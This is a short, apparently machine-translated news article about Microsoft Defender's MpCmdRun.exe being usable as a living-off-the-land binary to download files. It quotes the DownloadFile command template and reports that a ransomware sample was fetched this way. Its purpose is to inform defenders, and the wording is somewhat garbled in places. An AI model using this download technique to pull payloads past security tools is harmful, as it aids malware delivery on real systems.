The legal archives malicious operating system are known as live-off-the-land binaries or LOLBIN.
In the latest update received by Microsoft Defender, the command line tool MpCmdRun.exe may allow malicious files to be downloaded from a remote location.
Following this trick, Microsoft Defender is another Windows program that can exploit a malicious agent to carry out attacks.
Microsoft Defender: can be used as LOLBIN
The security researcher Mohammad Askar, was the first to discover that a recent update to the Microsoft Defender command line tool now includes a new feature in the DownloadFile command-line.
This ability allows a local user to use Microsoft Antimalware Service Command Line Utility (MpCmdRun.exe) to download a file from a remote location using the following command:
MpCmdRun.exe -DownloadFile -url [url] -path [path_to_save_file]
According to information published by BleepingComputer, this feature was added to Microsoft Defender in the version 4.18.2007.9 ή 4.18.2009.9.
As you can see below, the resources.exe file has downloaded a sample WastedLocker Ransomware that was used in a recent attack Garmin.
The good news is that Microsoft Defender is able to detect malicious files downloaded with MpCmdRun.exe, but it is unknown if any other AV software will allow this program to bypass their commands. With this discovery, program administrators and partners now have an additional executable Windows that they need to monitor so that it is not used against them.